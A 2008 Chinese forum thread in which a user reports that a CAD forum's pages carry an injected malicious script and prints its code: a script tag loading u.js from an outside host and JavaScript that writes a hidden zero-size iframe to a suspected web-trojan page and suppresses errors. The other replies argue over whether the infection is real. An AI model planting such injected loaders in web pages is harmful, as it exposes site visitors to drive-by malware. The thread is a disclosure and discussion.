此网被挂马

czy12

马:Hack.Exploit.Script.JS.Mixed.c

1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>
   1 L0 J, W0 H+ A7 c- r2 a  K
2. 
   
3. document.writeln("<script>";
   " h0 R& e: \  x( N
4. document.writeln("function oK_Begin(){";
   ) A! x; ~1 s& r2 \4 D7 K
5. document.writeln("var Then = new Date() ";
   
6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
   ) P' g0 X% G  w0 ?) g
7. document.writeln("var cookieString = new String(document.cookie)";
   
8. document.writeln("var cookieHeader = "Cookie1=" ";
   6 A3 L' ~' ~2 A9 l! t) ~
9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
   
10. document.writeln("if (beginPosition != -1){ ";
    - `6 b1 o. I6 I) N, t' f5 L' u
11. document.writeln("} else ";
    
12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";
    
13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
    
14. document.writeln("}";
    8 n; l6 N7 O) J& B9 D
15. document.writeln("}";
    2 b& P. H  M8 m$ d) r* P  W, \
16. document.writeln("oK_Begin();";
    
17. document.writeln("<\/script>";
    7 _" S% j" {5 O; m0 B# y9 Y
18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
    
19. 
    ( g6 k2 p+ f6 f$ [: H
20. 
    
21. 
    ) z6 F; ^! e: @3 z3 M6 v$ J
22. 
    4 ~' F3 K; G: z+ v4 i) N
23. 
    

复制代码

虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马

19720205

请管理员确认是否网页挂马?

cayuer

我的麦咖啡都没检测出来 你什么杀毒软件？

czy12

不是杀软件查的.
' t# V% ?5 i6 Q, |" N. }只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
1 y4 K2 V4 u, @* `) r1 _9 M不过,已经被清理了.
! x) g; B8 w# ?. a. D' i* r
HEHE只是没有礼貌

[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]

江南有雪

你这个什么网站，哪里出来的？
# X, Z* M1 N# E, ?0 K
ht tp://u.cruze3.cn/u.js

czy12

http://u.cruze3.cn/u.js
此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
HEHE

wwqq

这跟三维有什么关系？

czy12

这是挂在三维网论坛里的.
红线所指

huang_baker

奇怪，为什么我的里面没有？是不是楼主的机器自己带病毒了？

小雪

自己的机子中毒了，就不要满天喊叫了，没人会认为你是一个杀毒的行家

czy12

不学无术.
  y" f/ o0 z  L0 N5 E' U* h: DHEHE

yyywwwhk

但在:
http://www.3dportal.cn/discuz/ 之原始檔
) D8 @; e! Q/ m0 S似乎看不见楼主所说的 http://u.cruze3.cn/u.js

[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]

新洁电子

经过自编扫描代码处理结果，未发现楼主说的挂马代码！

请清理自己计算机的缓冲区！

college

看您的尾符/script，很像是U盘病毒。

czy12

DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
4 A5 h! s* c) R5 p我也说了：已修复。

ps:这与缓存毫无关系。虽然缓存中有U.JS.
  s9 F8 j) u/ W7 H4 e但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?
5 G, o' `0 M/ P& y" O
8 S9 X0 x6 |! M% }, v9 dscript是个JAVA代码,与U盘何关?
5 j! s( U0 A$ h  S' U
HEHE

[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]

新洁电子

非也，代码是程序直接采样的当时的网页代码，是自编的，算不上权威，但是可以直接进入部分加密网站！
; {+ `- A5 b" s2 {+ t; ]
3 m* @* N. a. U' F8 [5 L6 }& t9 N如果却如你说的修改了，我想，这只有论坛管理员有这个权限，即便是后台也是有记录的。假如确实是论坛后台修改了，一定会给大伙一个说法的。
0 B$ r6 z& w% _$ y1 U0 Y  d% p8 b
相反，目前从各方面提供的代码显示，确实“此时此刻”是正常的！至于继续讨论已经无大的价值！